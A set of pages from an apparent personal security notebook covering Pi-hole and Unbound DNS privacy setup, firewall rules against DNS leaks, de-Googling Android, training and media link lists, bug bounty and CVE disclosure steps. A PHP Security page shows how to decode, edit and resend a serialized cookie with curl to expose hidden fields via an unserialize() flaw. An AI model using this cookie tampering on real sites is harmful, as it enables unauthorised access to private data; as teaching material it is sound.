manipulation. Specifically, this type of configuration addresses: * **Strong privacy with DNSSEC validation:** Protecting DNS integrity and authenticity by validating DNSSEC signatures on all queries. * **Upstream DNS encryption with DNS-over-TLS (DoT):** Encrypting DNS queries between your local DNS resolver and upstream DNS servers to prevent eavesdropping and tampering. * **SELinux compliance for Unbound running directly on the host:** Guidance on configuring SELinux policies and booleans to allow Unbound to function correctly on enforcing systems. * **Docker container isolation when both Pi-hole and Unbound run as containers:** Best practices for networking, volume management, and security confinement within Docker environments. * **Proper firewall and network configuration for DNS leak prevention:** Cross-platform instructions for firewall rule configuration to ensure all DNS traffic is forced through Pi-hole and Unbound, blocking any attempts to bypass or leak outside the secured DNS path. * * * [](https://martian1337.gitbook.io/notes/digital-privacy/privacy-focused-dns-configuration-guides/private-and-secure-dns-with-pi-hole-and-unbound#explanation-using-unbound-with-pi-hole-without-opn) Explanation: Using Unbound with Pi-hole ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ### [](https://martian1337.gitbook.io/notes/digital-privacy/privacy-focused-dns-configuration-guides/private-and-secure-dns-with-pi-hole-and-unbound#what-is-unbound) What is Unbound? Unbound is a fast, validating, recursive, caching DNS resolver. It can: * Query DNS root servers directly, or * Forward DNS requests to upstream servers. Importantly, Unbound supports **DNS over TLS (DoT)**, meaning it can encrypt DNS queries sent to upstream providers, preventing eavesdropping and tampering on the network. ### [](https://martian1337.gitbook.io/notes/digital-privacy/privacy-focused-dns-configuration-guides/private-and-secure-dns-with-pi-hole-and-unbound#what-is-pi-hole) What is Pi-hole? Pi-hole is a network-wide ad blocker that acts as a DNS sinkhole. It: * Intercepts DNS queries from clients, * Blocks requests to known ad and tracker domains, * Forwards allowed queries to an upstream DNS resolver. ### [](https://martian1337.gitbook.io/notes/digital-privacy/privacy-focused-dns-configuration-guides/private-and-secure-dns-with-pi-hole-and-unbound#combining-pi-hole-with-unbound) Combining Pi-hole with Unbound When running them together (often on the same device or local network): 1. **Clients send DNS queries to Pi-hole.** * Pi-hole filters and blocks ads/trackers. 2. **Pi-hole forwards DNS queries to Unbound.** * Unbound acts as the upstream DNS resolver. * Unbound can itself use DoT for encrypted communication to external DNS servers. 3. **Unbound returns DNS responses to Pi-hole, which forwards them to clients.** This setup provides: * **Ad-blocking and privacy filtering** on the local network (via Pi-hole), * **Encrypted DNS resolution to the internet** (via Unbound’s DoT), protecting DNS queries beyond your network. ### [](https://martian1337.gitbook.io/notes/digital-privacy/privacy-focused-dns-configuration-guides/private-and-secure-dns-with-pi-hole-and-unbound#typical-configuration-steps) Typical Configuration Steps * **Install Pi-hole** on your local device or server. * In Pi-hole’s settings, **set the upstream DNS server as the IP address where Unbound is running**. * This could be `127.0.0.1` if both run on the same machine, or a LAN IP of the Unbound host. * **Install and configure Unbound** as a local DNS recursive resolver. * In Unbound’s config, **set upstream DNS servers with DoT** (for example, Cloudflare’s `1.1.1.1@853` or Quad9’s `9.9.9.9@853`). Ensure certificate verification is enabled. * Make sure Unbound **listens on the IP/interface IP** to receive queries from Pi-hole. * Configure any necessary firewall rules to allow DNS (port 53) traffic from Pi-hole to Unbound, and allow Unbound outbound TCP port 853 to the upstream DoT servers. ### [](https://martian1337.gitbook.io/notes/digital-privacy/privacy-focused-dns-configuration-guides/private-and-secure-dns-with-pi-hole-and-unbound#benefits-of-this-setup) Benefits of this Setup * **Privacy**: DNS queries from your network are encrypted in transit to the internet, preventing ISP or attacker spying. * **Ad and tracker blocking**: Pi-hole prevents many unwanted requests, improving privacy and network performance. * **Control and transparency**: Both Unbound and Pi-hole are open source and configurable. ### [](https://martian1337.gitbook.io/notes/digital-privacy/privacy-focused-dns-configuration-guides/private-and-secure-dns-with-pi-hole-and-unbound#important-considerations) Important Considerations * Avoid DNS loops: Ensure Pi-hole sends queries only to Unbound, and Unbound is not forwarding back to Pi-hole. * Firewall rules must allow Pi-hole to query Unbound on port 53 and allow Unbound to use port 853 outbound. * Optionally, enforce clients to use Pi-hole by DHCP or firewall rules to prevent DNS leak. * * * By following these guides, you can set up a robust DNS stack that offers enhanced privacy, security, and control, suitable for home or small business networks on a wide range of Linux distributions. [PreviousPrivacy-Focused DNS Configuration Guides](https://martian1337.gitbook.io/notes/digital-privacy/privacy-focused-dns-configuration-guides) [NextDNS Leak Prevention and Firewall Configuration](https://martian1337.gitbook.io/notes/digital-privacy/privacy-focused-dns-configuration-guides/private-and-secure-dns-with-pi-hole-and-unbound/dns-leak-prevention-and-firewall-configuration) Last updated 8 months ago * [Explanation: Using Unbound with Pi-hole](https://martian1337.gitbook.io/notes/digital-privacy/privacy-focused-dns-configuration-guides/private-and-secure-dns-with-pi-hole-and-unbound#explanation-using-unbound-with-pi-hole-without-opn) * [What is Unbound?](https://martian1337.gitbook.io/notes/digital-privacy/privacy-focused-dns-configuration-guides/private-and-secure-dns-with-pi-hole-and-unbound#what-is-unbound) * [What is Pi-hole?](https://martian1337.gitbook.io/notes/digital-privacy/privacy-focused-dns-configuration-guides/private-and-secure-dns-with-pi-hole-and-unbound#what-is-pi-hole) * [Combining Pi-hole with Unbound](https://martian1337.gitbook.io/notes/digital-privacy/privacy-focused-dns-configuration-guides/private-and-secure-dns-with-pi-hole-and-unbound#combining-pi-hole-with-unbound) * [Typical Configuration Steps](https://martian1337.gitbook.io/notes/digital-privacy/privacy-focused-dns-configuration-guides/private-and-secure-dns-with-pi-hole-and-unbound#typical-configuration-steps) * [Benefits of this Setup](https://martian1337.gitbook.io/notes/digital-privacy/privacy-focused-dns-configuration-guides/private-and-secure-dns-with-pi-hole-and-unbound#benefits-of-this-setup) * [Important Considerations](https://martian1337.gitbook.io/notes/digital-privacy/privacy-focused-dns-configuration-guides/private-and-secure-dns-with-pi-hole-and-unbound#important-considerations) --- # De-Googling Android | Martian Defense NoteBook For the complete documentation index, see [llms.txt](https://martian1337.gitbook.io/notes/llms.txt) . This page is also available as [Markdown](https://martian1337.gitbook.io/notes/digital-privacy/opsec/de-googling-android.md) . When Google wants to release a new version of Android it goes through [AOSP](https://source.android.com/) first. This Open-Source version is received by every phone OEM/Manufacturer. Google does not put any proprietary code in this version: * No Google Play, YouTube, Gmail * No Google Login * No telemetry with Google at all You can also use the ROMs at [Evolution-X](https://evolution-x.org/download) #### [](https://martian1337.gitbook.io/notes/digital-privacy/opsec/de-googling-android#critical-guidelines) Critical Guidelines 1. In order to De-Google any Android device it must be rooted into AOSP OS 2. After phone is rooted, **don't reinstall Google Play or any related apps** 3. Always protect your true IP. Any home address IP (ISP provided IP) discovered in use by the device will compromise the user's identity 4. Be careful which apps are installed on the devices 5. Don't add any google account to any app on the device ### [](https://martian1337.gitbook.io/notes/digital-privacy/opsec/de-googling-android#apps-to-install) Apps to Install Install [F-Droid](https://f-droid.org/) - Open-source Android Apps unrelated to Google play DuckDuckGo - Privacy Browser [Newpipe](https://newpipe.net/#download) - Youtube alternative without permissions/identity **Aurora Store** [https://f-droid.org/en/packages/com.aurora.store/](https://f-droid.org/en/packages/com.aurora.store/) Aurora store spoofs the phone's ID to download apps that don't require much telemetry and includes updates from Google Play. Some apps will always require IP information but Aurora prevents the identification of the device itself. **MicroG** Some apps require Google services so we must install MicroG. MicroG is a Google services spoofer that makes apps think they are communicating with Google, routes notifications for installed private apps, and can also spoof location. Note: Enable Device registration to receive notifications #### [](https://martian1337.gitbook.io/notes/digital-privacy/opsec/de-googling-android#osmand) OsmAnd [https://f-droid.org/en/packages/net.osmand.plus/](https://f-droid.org/en/packages/net.osmand.plus/) OsmAnd is an offline world map application based on OpenStreetMap (OSM), which allows you to navigate taking into account the preferred roads and vehicle dimensions **Authy** Authy is a Google Authenticator alternative and can be used for OTP logins [](https://martian1337.gitbook.io/notes/digital-privacy/opsec/de-googling-android#travel-profile-considerations) Travel Profile considerations --------------------------------------------------------------------------------------------------------------------------------------------------- **WAZE** Waze is owned by Google but can be used without Google location services for Navigation & GPS use. Waze can be used without logging in to the app [PreviousMartian's Stack](https://martian1337.gitbook.io/notes/digital-privacy/opsec/martians-stack) [NextAcquiring Monero (XMR) Anonymously](https://martian1337.gitbook.io/notes/digital-privacy/opsec/acquiring-monero-xmr-anonymously) Last updated 8 months ago * [Apps to Install](https://martian1337.gitbook.io/notes/digital-privacy/opsec/de-googling-android#apps-to-install) * [Travel Profile considerations](https://martian1337.gitbook.io/notes/digital-privacy/opsec/de-googling-android#travel-profile-considerations) --- # Certifications | Martian Defense NoteBook For the complete documentation index, see [llms.txt](https://martian1337.gitbook.io/notes/llms.txt) . This page is also available as [Markdown](https://martian1337.gitbook.io/notes/notes/certifications.md) . [CSSLP](https://martian1337.gitbook.io/notes/notes/certifications/csslp) [PreviousCryptography Checklist](https://martian1337.gitbook.io/notes/notes/cheatsheets/capture-the-flag-training/cryptography-checklist) [NextCSSLP](https://martian1337.gitbook.io/notes/notes/certifications/csslp) Last updated 1 year ago --- # Web Security Testing | Martian Defense NoteBook For the complete documentation index, see [llms.txt](https://martian1337.gitbook.io/notes/llms.txt) . This page is also available as [Markdown](https://martian1337.gitbook.io/notes/notes/cheatsheets/web-security-testing.md) . [Information Gathering](https://martian1337.gitbook.io/notes/notes/cheatsheets/web-security-testing/information-gathering) [Web Fuzzing](https://martian1337.gitbook.io/notes/notes/cheatsheets/web-security-testing/web-fuzzing) [SQL Injection Fundamentals](https://martian1337.gitbook.io/notes/notes/cheatsheets/web-security-testing/sql-injection-fundamentals) [Login Brute Forcing](https://martian1337.gitbook.io/notes/notes/cheatsheets/web-security-testing/login-brute-forcing) [PreviousCheatsheets](https://martian1337.gitbook.io/notes/notes/cheatsheets) [NextInformation Gathering](https://martian1337.gitbook.io/notes/notes/cheatsheets/web-security-testing/information-gathering) --- # Live Vulnerable Sites | Martian Defense NoteBook For the complete documentation index, see [llms.txt](https://martian1337.gitbook.io/notes/llms.txt) . This page is also available as [Markdown](https://martian1337.gitbook.io/notes/training-and-career/platforms/live-vulnerable-sites.md) . [Testfire.net](https://demo.testfire.net/login.jsp) - Vulnerable Banking Application [OWASP Juice Shop](https://demo.owasp-juice.shop/#/) - Vulnerable Shopping Application [Google Gruyere](https://google-gruyere.appspot.com/) - Google Developed app with various by-design vulnerabilities [bWAPP](http://www.itsecgames.com/) - Open-source vulnerable web app with web vulnerabilities for practice. [PreviousCTF Sites](https://martian1337.gitbook.io/notes/training-and-career/platforms/ctf-sites) [NextApplication Security](https://martian1337.gitbook.io/notes/resources/appsec) Last updated 10 months ago --- # General | Martian Defense NoteBook For the complete documentation index, see [llms.txt](https://martian1337.gitbook.io/notes/llms.txt) . This page is also available as [Markdown](https://martian1337.gitbook.io/notes/training-and-career/platforms/general.md) . [](https://martian1337.gitbook.io/notes/training-and-career/platforms/general#web-languages) Web Languages --------------------------------------------------------------------------------------------------------------- [FreeCodeCamp Javascript Course](https://www.youtube.com/watch?v=jS4aFq5-91M) [](https://martian1337.gitbook.io/notes/training-and-career/platforms/general#linux) Linux ----------------------------------------------------------------------------------------------- [Bash Academy](https://guide.bash.academy/) [](https://martian1337.gitbook.io/notes/training-and-career/platforms/general#cloud) Cloud ----------------------------------------------------------------------------------------------- [Altered Security - Azure Pentesting](https://azure.enterprisesecurity.io/login.jsp) [Cloud Resume Challenge](https://cloudresumechallenge.dev/) [https://pwnedlabs.io/](https://pwnedlabs.io/) [](https://martian1337.gitbook.io/notes/training-and-career/platforms/general#reverse-engineering) Reverse Engineering --------------------------------------------------------------------------------------------------------------------------- [https://revers.engineering/applied-re-accelerated-assembly-p1/](https://revers.engineering/applied-re-accelerated-assembly-p1/) [https://github.com/SkyPenguinLabs/REplay](https://github.com/SkyPenguinLabs/REplay) [](https://martian1337.gitbook.io/notes/training-and-career/platforms/general#cryptography) Cryptography ------------------------------------------------------------------------------------------------------------- [https://cryptohack.org/](https://cryptohack.org/) [PreviousPlatforms](https://martian1337.gitbook.io/notes/training-and-career/platforms) [NextOffensive Security](https://martian1337.gitbook.io/notes/training-and-career/platforms/offensive-security) Last updated 1 year ago * [Web Languages](https://martian1337.gitbook.io/notes/training-and-career/platforms/general#web-languages) * [Linux](https://martian1337.gitbook.io/notes/training-and-career/platforms/general#linux) * [Cloud](https://martian1337.gitbook.io/notes/training-and-career/platforms/general#cloud) * [Reverse Engineering](https://martian1337.gitbook.io/notes/training-and-career/platforms/general#reverse-engineering) * [Cryptography](https://martian1337.gitbook.io/notes/training-and-career/platforms/general#cryptography) --- # Defensive Security | Martian Defense NoteBook For the complete documentation index, see [llms.txt](https://martian1337.gitbook.io/notes/llms.txt) . This page is also available as [Markdown](https://martian1337.gitbook.io/notes/training-and-career/platforms/defensive-security.md) . [](https://martian1337.gitbook.io/notes/training-and-career/platforms/defensive-security#malware-analysis) Malware Analysis -------------------------------------------------------------------------------------------------------------------------------- [Awesome Malware Analysis repo](https://github.com/rshipp/awesome-malware-analysis) ! [University of Cincinatti Malware Analysis class](https://class.malware.re/) [Malware Analysis course by RPISEC](https://github.com/RPISEC/Malware) [Zero2Auto Malware RE course](https://courses.zero2auto.com/) ! [TCM Security Practical Junior Malware Researcher course](https://certifications.tcm-sec.com/pjmr/) ! [LetsDefend Malware Analysis Fundamentals](https://t.co/IlSVy6V50V) [MSSP Lab](https://mssplab.github.io/) [Malware Unicorn](https://malwareunicorn.org/#/workshops) [](https://martian1337.gitbook.io/notes/training-and-career/platforms/defensive-security#vendor-specific) Vendor-Specific ------------------------------------------------------------------------------------------------------------------------------ [Qualys Vulnerability Management training](https://www.qualys.com/training/) [Azure Sentinel Training](https://github.com/Azure/Azure-Sentinel/blob/master/Solutions/Training/Azure-Sentinel-Training-Lab/README.md) [](https://martian1337.gitbook.io/notes/training-and-career/platforms/defensive-security#incident-response) Incident Response ---------------------------------------------------------------------------------------------------------------------------------- [OpenSOC - Network Defense Simulation](https://opensoc.io/) [PreviousOffensive Security](https://martian1337.gitbook.io/notes/training-and-career/platforms/offensive-security) [NextCTF Sites](https://martian1337.gitbook.io/notes/training-and-career/platforms/ctf-sites) Last updated 1 year ago * [Malware Analysis](https://martian1337.gitbook.io/notes/training-and-career/platforms/defensive-security#malware-analysis) * [Vendor-Specific](https://martian1337.gitbook.io/notes/training-and-career/platforms/defensive-security#vendor-specific) * [Incident Response](https://martian1337.gitbook.io/notes/training-and-career/platforms/defensive-security#incident-response) --- # DNS Leak Prevention and Firewall Configuration | Martian Defense NoteBook For the complete documentation index, see [llms.txt](https://martian1337.gitbook.io/notes/llms.txt) . This page is also available as [Markdown](https://martian1337.gitbook.io/notes/digital-privacy/privacy-focused-dns-configuration-guides/private-and-secure-dns-with-pi-hole-and-unbound/dns-leak-prevention-and-firewall-configuration.md) . It is important to block all outbound DNS traffic on the host except traffic destined to your Pi-hole and Unbound services (whether on host or Docker network). This prevents DNS queries from bypassing your private DNS, avoiding leaks to ISP or external resolvers. #### [](https://martian1337.gitbook.io/notes/digital-privacy/privacy-focused-dns-configuration-guides/private-and-secure-dns-with-pi-hole-and-unbound/dns-leak-prevention-and-firewall-configuration#red-hat-based-distros-rhel-centos-fedora-rocky-linux-almalinux-etc.-using-firewalld) Red Hat-based Distros (RHEL, CentOS, Fedora, Rocky Linux, AlmaLinux, etc.) Using `firewalld` Copy # Block all outbound DNS TCP/UDP traffic by default sudo firewall-cmd --permanent --add-rich-rule='rule family="ipv4" source address="0.0.0.0/0" port port="53" protocol="tcp" reject' sudo firewall-cmd --permanent --add-rich-rule='rule family="ipv4" source address="0.0.0.0/0" port port="53" protocol="udp" reject' # Allow DNS traffic to local Docker bridge subnet (example here: 172.28.0.0/16) sudo firewall-cmd --permanent --add-rich-rule='rule family="ipv4" source address="172.28.0.0/16" port port="53" protocol="tcp" accept' sudo firewall-cmd --permanent --add-rich-rule='rule family="ipv4" source address="172.28.0.0/16" port port="53" protocol="udp" accept' # Reload firewall to apply rules sudo firewall-cmd --reload ### [](https://martian1337.gitbook.io/notes/digital-privacy/privacy-focused-dns-configuration-guides/private-and-secure-dns-with-pi-hole-and-unbound/dns-leak-prevention-and-firewall-configuration#debian-ubuntu-using-ufw) Debian/Ubuntu Using `ufw` Copy # Deny all outgoing DNS traffic by default sudo ufw deny out 53/tcp sudo ufw deny out 53/udp # Allow DNS queries only to Docker network IP range (example: 172.28.0.0/16) sudo ufw allow out to 172.28.0.0/16 port 53 proto tcp sudo ufw allow out to 172.28.0.0/16 port 53 proto udp # Reload ufw to apply changes sudo ufw reload ### [](https://martian1337.gitbook.io/notes/digital-privacy/privacy-focused-dns-configuration-guides/private-and-secure-dns-with-pi-hole-and-unbound/dns-leak-prevention-and-firewall-configuration#arch-linux-or-other-distros-using-iptables) Arch Linux or Other Distros Using `iptables` * * * ### [](https://martian1337.gitbook.io/notes/digital-privacy/privacy-focused-dns-configuration-guides/private-and-secure-dns-with-pi-hole-and-unbound/dns-leak-prevention-and-firewall-configuration#for-arch-linux-or-other-distros-using-nftables) For Arch Linux or Other Distros Using `nftables` ### [](https://martian1337.gitbook.io/notes/digital-privacy/privacy-focused-dns-configuration-guides/private-and-secure-dns-with-pi-hole-and-unbound/dns-leak-prevention-and-firewall-configuration#firewall-configuration-notes) Firewall Configuration Notes * Replace `172.28.0.0/16` with the actual subnet of your Docker bridge network or host DNS servers as applicable. * Ensure **all client devices and the host itself use only Pi-hole IP(s) as their DNS servers**. * Test your DNS leak protection with online tools like [dnsleaktest.com](https://www.dnsleaktest.com/) . * Adjust firewall rules for IPv6 if your network utilizes it. * For less common firewalls, consult the distro or firewall documentation for equivalent rules permitting and restricting DNS traffic. [PreviousPrivate and Secure DNS with Pi-hole and Unbound](https://martian1337.gitbook.io/notes/digital-privacy/privacy-focused-dns-configuration-guides/private-and-secure-dns-with-pi-hole-and-unbound) [NextConfiguring DoT with Unbound and Pi-hole on OPNsense](https://martian1337.gitbook.io/notes/digital-privacy/privacy-focused-dns-configuration-guides/configuring-dot-with-unbound-and-pi-hole-on-opnsense) Last updated 8 months ago * [Debian/Ubuntu Using ufw](https://martian1337.gitbook.io/notes/digital-privacy/privacy-focused-dns-configuration-guides/private-and-secure-dns-with-pi-hole-and-unbound/dns-leak-prevention-and-firewall-configuration#debian-ubuntu-using-ufw) * [Arch Linux or Other Distros Using iptables](https://martian1337.gitbook.io/notes/digital-privacy/privacy-focused-dns-configuration-guides/private-and-secure-dns-with-pi-hole-and-unbound/dns-leak-prevention-and-firewall-configuration#arch-linux-or-other-distros-using-iptables) * [For Arch Linux or Other Distros Using nftables](https://martian1337.gitbook.io/notes/digital-privacy/privacy-focused-dns-configuration-guides/private-and-secure-dns-with-pi-hole-and-unbound/dns-leak-prevention-and-firewall-configuration#for-arch-linux-or-other-distros-using-nftables) * [Firewall Configuration Notes](https://martian1337.gitbook.io/notes/digital-privacy/privacy-focused-dns-configuration-guides/private-and-secure-dns-with-pi-hole-and-unbound/dns-leak-prevention-and-firewall-configuration#firewall-configuration-notes) Copy # Drop all outbound DNS TCP and UDP traffic sudo iptables -A OUTPUT -p tcp --dport 53 -j DROP sudo iptables -A OUTPUT -p udp --dport 53 -j DROP # Insert rule to ACCEPT DNS traffic to Docker bridge subnet before drop rules sudo iptables -I OUTPUT -p tcp -d 172.28.0.0/16 --dport 53 -j ACCEPT sudo iptables -I OUTPUT -p udp -d 172.28.0.0/16 --dport 53 -j ACCEPT Copy nft add table inet filter nft add chain inet filter output { type filter hook output priority 0 \; } # Drop all outbound DNS traffic nft add rule inet filter output udp dport 53 drop nft add rule inet filter output tcp dport 53 drop # Accept DNS traffic to Docker subnet (replace subnet accordingly) nft add rule inet filter output ip daddr 172.28.0.0/16 udp dport 53 accept nft add rule inet filter output ip daddr 172.28.0.0/16 tcp dport 53 accept --- # Media | Martian Defense NoteBook For the complete documentation index, see [llms.txt](https://martian1337.gitbook.io/notes/llms.txt) . This page is also available as [Markdown](https://martian1337.gitbook.io/notes/training-and-career/media.md) . Podcasts YouTube Channels [Absolute AppSec](https://absoluteappsec.com/) [Adventures of Alice and Bob by BeyondTrust](https://www.beyondtrust.com/podcast) [Cyber Security Sauna](https://cybersecuritysauna.libsyn.com/) [Darknet Diaries](https://darknetdiaries.com/) [Hacking Humans](https://thecyberwire.com/podcasts/hacking-humans) [Malicious Life by Cybereason](https://malicious.life/) [Naked Security Podcast by SOPHOS](https://nakedsecurity.sophos.com/category/podcast/) [OWASP Podcast](https://owasp.org/www-project-podcast/) [Security Weekly](https://securityweekly.com/) [Smashing Security](https://www.smashingsecurity.com/) [Social-Engineer Podcast](https://www.social-engineer.org/podcasts/) [The 443 Security Simplified](https://www.secplicity.org/category/the-443/) [The Cyber Queens Podcast](https://www.cyberqueenspodcast.com/) [The Cyber Tap (Purdue cyberTAP)](https://cyber.tap.purdue.edu/) [The Hacker Chronicles Podcast by Tenable](https://www.tenable.com/podcast/hacker-chronicles) [The Hacker Mind](https://thehackermind.com/) [The H4unt3d Hacker](https://thehauntedhacker.com/podcasts) [The Shared Security Show](https://sharedsecurity.net/) [What The Shell](https://whattheshellpod.com/) [Modem Mischief](https://open.spotify.com/show/7zYPND0AQUW8EKEv1RC30s?si=cd40ca10a67e4ae5&nd=1) [Click here by RecordedFuture](https://open.spotify.com/show/2kxOETGvN32D6hZu0wPntG?si=44442e9431594bcf&nd=1) [Hacked](https://open.spotify.com/show/21zZfOy7VCSIIWlJ64DElv?si=085e8ff8421e4f39&nd=1) DFIRScience [HackerOne videos](https://www.hacker101.com/videos) [InsiderPhD](https://www.youtube.com/c/InsiderPhD) [Series for new bug hunters](https://www.youtube.com/playlist?list=PLbyncTkpno5FAC0DJYuJrEqHSMdudEffw) [Jhaddix](https://www.youtube.com/c/jhaddix) [IppSec Channel - Hack The Box Writeups](https://www.youtube.com/channel/UCa6eh7gCkpPo5XXUDfygQQA) [LiveOverflow - Explore weird machines...](https://www.youtube.com/channel/UClcE-kVhqyiHCcjYwcpfj9w) [GynvaelEN - Podcasts about CTFs, computer security, programing and more](https://www.youtube.com/channel/UCCkVMojdBWS-JtH7TliWkVg) [John Hammond - Wargames and CTF writeups](https://www.youtube.com/channel/UCVeW9qkBjo3zosnqUbG7CFw) [Murmus CTF - Weekly live streamings](https://www.youtube.com/channel/UCUB9vOGEUpw7IKJRoR4PK-A) [PwnFunction](https://www.youtube.com/channel/UCW6MNdOsqv2E9AjQkv9we7A) [OJ Reeves](https://www.youtube.com/channel/UCz2aqRQWMhJ4wcJq3XneqRg) [Hacksplained - A Beginner Friendly Guide to Hacking](https://www.youtube.com/c/hacksplained) [STÖK](https://www.youtube.com/c/STOKfredrik) [Defcon](https://www.youtube.com/user/DEFCONConference) [Hackersploit](https://www.youtube.com/channel/UC0ZTPkdxlAKf-V33tqXwi3Q) [The Cyber Mentor](https://www.youtube.com/channel/UC0ArlFuFYMpEewyRBzdLHiw) [Nahamsec](https://www.youtube.com/c/Nahamsec) [Hackerone](https://www.youtube.com/channel/UCsgzmECky2Q9lQMWzDwMhYw) [The Hated one](https://www.youtube.com/channel/UCjr2bPAyPV7t35MvcgT3W8Q) [stacksmashing / Ghidra Ninja](https://www.youtube.com/channel/UC3S8vxwRfqLBdIhgRlDRVzw) [Hak5](https://www.youtube.com/channel/UC3s0BtrBJpwNDaflRSoiieQ) [Professor Messer](https://www.youtube.com/@professormesser) [BlackPerl](https://www.youtube.com/@BlackPerl) [Hack eXPlorer](https://www.youtube.com/@HackeXPlorer) [Peter Yaworski](https://www.youtube.com/@yaworsk1) [Security Weekly](https://www.youtube.com/@SecurityWeekly) [MalwareTechBlog](https://www.youtube.com/@MalwareTechBlog) [DFIRScience](https://www.youtube.com/@DFIRScience) [PreviousReading and Repos](https://martian1337.gitbook.io/notes/training-and-career/reading-and-repos) [NextGuides](https://martian1337.gitbook.io/notes/training-and-career/guides) Last updated 1 year ago --- # Bug Bounty Programs | Martian Defense NoteBook For the complete documentation index, see [llms.txt](https://martian1337.gitbook.io/notes/llms.txt) . This page is also available as [Markdown](https://martian1337.gitbook.io/notes/notes/security-research/bug-bounty/bug-bounty-programs.md) . [![Logo](https://martian1337.gitbook.io/notes/~gitbook/image?url=https%3A%2F%2Fbbradar.io%2Fradar.png&width=20&dpr=3&quality=100&sign=aa54425&sv=2)The Bug Bounty Radar - The Latest Public Bug Bounty Programs | The Bug Bounty Radarbbradar.io](https://bbradar.io/) [![Logo](https://martian1337.gitbook.io/notes/~gitbook/image?url=https%3A%2F%2Fwww.bugcrowd.com%2Fwp-content%2Fthemes%2Fbugcrowd%2Fassets%2Fimages%2Ffavicon%2Fapple-touch-icon.png&width=20&dpr=3&quality=100&sign=cee60b89&sv=2)Bug Bounty Program List | BugcrowdBugcrowd](https://www.bugcrowd.com/bug-bounty-list/) [![Logo](https://martian1337.gitbook.io/notes/~gitbook/image?url=https%3A%2F%2Fwww.datocms-assets.com%2F85623%2F1720084354-favicon.svg%3Fauto%3Dformat%26h%3D192%26w%3D192&width=20&dpr=3&quality=100&sign=4a53a434&sv=2)Bug Bounty Public ProgramsIntigriti](https://www.intigriti.com/programs) [PreviousBug Bounty](https://martian1337.gitbook.io/notes/notes/security-research/bug-bounty) [NextCVE Hunting Python Repos with VulnHunter](https://martian1337.gitbook.io/notes/notes/security-research/cve-hunting-python-repos-with-vulnhunter) Last updated 1 year ago --- # PHP Security | Martian Defense NoteBook For the complete documentation index, see [llms.txt](https://martian1337.gitbook.io/notes/llms.txt) . This page is also available as [Markdown](https://martian1337.gitbook.io/notes/notes/product-security-engineering/php-security.md) . **Decode the cookie for unserialize() flaw** View the cookies from the sample web application using your browser’s built-in "developer tools". For instance, opening up your developer console, you can enter `document.cookie`. We are interested in the value set for the applicable cookie, which determines which fields to display. Our "columns" cookie has the following encoded value: Copy YTo1OntzOjQ6Im5hbWUiO2I6MTtzOjU6ImVtYWlsIjtiOjA7czo1OiJwaG9uZSI7YjowO3M6ODoic3VtbWFyeSI7YjoxO3M6NjoicGF5IjtiOjA7fTc%3D we see a string ending with `%3D` or `=` there is a high chance it is encoded in Base64. To decode this string, enter the following in your Terminal: Copy echo "YTo1OntzOjQ6Im5hbWUiO2I6MTtzOjU6ImVtYWlsIjtiOjA7czo1OiJwaG9uZSI7YjowO3M6ODoic3VtbWFyeSI7YjoxO3M6NjoicGF5IjtiOjA7fTc%3D" | base64 -d Decoded, we can see that this is [serialized](https://en.wikipedia.org/wiki/Serialization) data. It says: an array of five elements, each element having as the index the column name and the value a boolean flag. We could expand this into an array that looks something like: Copy Array ( [name] => 1 [email] => 0 [phone] => 0 [summary] => 1 [pay] => 0 ) The boolean 1 or 0 values determine which fields are shown to the user. Optionally see [this article](https://en.wikipedia.org/wiki/PHP_serialization_format) for more details on this serialized data structure. We can modify the serialized string to show _all_ the columns by changing the `b:0` entries to `b:1`, re-encoding it in Base64, and replacing the value of the cookie. For instance, the following line at the Terminal will display a Base64-encoded string representing our serialized data where all the array values are "on": We're now going to tamper with the existing cookie to use this value instead. This can be done using a browser extensions and dedicated tools like BurpSuite, CyberChef, [Postman](https://learning.postman.com/docs/sending-requests/cookies/) , or even a web proxy. In this case, we can also just use [curl](https://everything.curl.dev/http/cookies) at the Terminal by passing the `-b` option: Replace "YOUR\_COOKIE\_VALUE" with your modified Base64-encoded string, through to the ending `=` sign, as created in the command above. This can be used to prove that, on the server side, an `unserialize()` function call was made to fetch the sensitive backend data. [PreviousThreat Modeling](https://martian1337.gitbook.io/notes/notes/product-security-engineering/threat-modeling) [NextProduct Security Governance](https://martian1337.gitbook.io/notes/notes/product-security-engineering/product-security-governance) Last updated 1 year ago Copy echo -n 'a:5:{s:4:"name";b:1;s:5:"email";b:1;s:5:"phone";b:1;s:8:"summary";b:1;s:6:"pay";b:1;}' | base64 -w0 Copy curl -H 'Origin: https://example.site' -X POST https://example.site -b "columns=YOUR_COOKIE_VALUE" --- # Publishing CVEs | Martian Defense NoteBook For the complete documentation index, see [llms.txt](https://martian1337.gitbook.io/notes/llms.txt) . This page is also available as [Markdown](https://martian1337.gitbook.io/notes/notes/security-research/publishing-cves.md) . 1. **Identify a New Vulnerability**: Research and ensure that the vulnerability you've discovered hasn't been reported. Check if the vulnerability has already been reported in the [MITRE Database](https://cve.mitre.org/) or other databases such as [exploit-db](https://www.exploit-db.com/) 2. **Responsible Disclosure to Vendor**: Contact the product's vendor or owner to report the vulnerability discreetly. Document all communication attempts for proof that you have tried to multiple times to contact the vendor in order to remediate the finding before going public with your research 3. **Work with Cooperative Vendors**: If the vendor is responsive, collaborate on a mitigation strategy and agree on a coordinated disclosure timeline. 4. **Handling Non-Responsive Vendors**: If there's no response, consider waiting for a period (30 to 90 days) before public disclosure. Meanwhile, apply for a CVE ID from MITRE. 5. **Request CVE ID from MITRE**: Submit the vulnerability details to MITRE for a CVE ID by requesting a CVE ID from MITRE via the [CVE Submission Form](https://cveform.mitre.org/) . This process can take time, and the CVE will initially be in a 'RESERVED' state. 6. **Publishing the CVE**: Once you've waited the agreed-upon time and have the CVE ID, publish your findings on platforms like PacketStorm Security or CX Security. Include the CVE ID in your publication. 7. **Notify MITRE of Publication**: After publishing, inform MITRE with the publication links to update the CVE from 'RESERVED' to 'PUBLISHED'. Additional References **Trustwave's Guide**: "A Simple Guide to Getting CVEs Published" offers a comprehensive step-by-step process. [Trustwave Guide](https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/a-simple-guide-to-getting-cves-published/) [https://infosecwriteups.com/how-to-register-and-publish-a-cve-for-your-awesome-vulnerability-e68a6a5f748f](https://infosecwriteups.com/how-to-register-and-publish-a-cve-for-your-awesome-vulnerability-e68a6a5f748f) [PreviousSecurity Research](https://martian1337.gitbook.io/notes/notes/security-research) [NextShodan Dork Cheatsheet](https://martian1337.gitbook.io/notes/notes/security-research/shodan-dork-cheatsheet) Last updated 1 year ago --- # JWTs and JSON | Martian Defense NoteBook For the complete 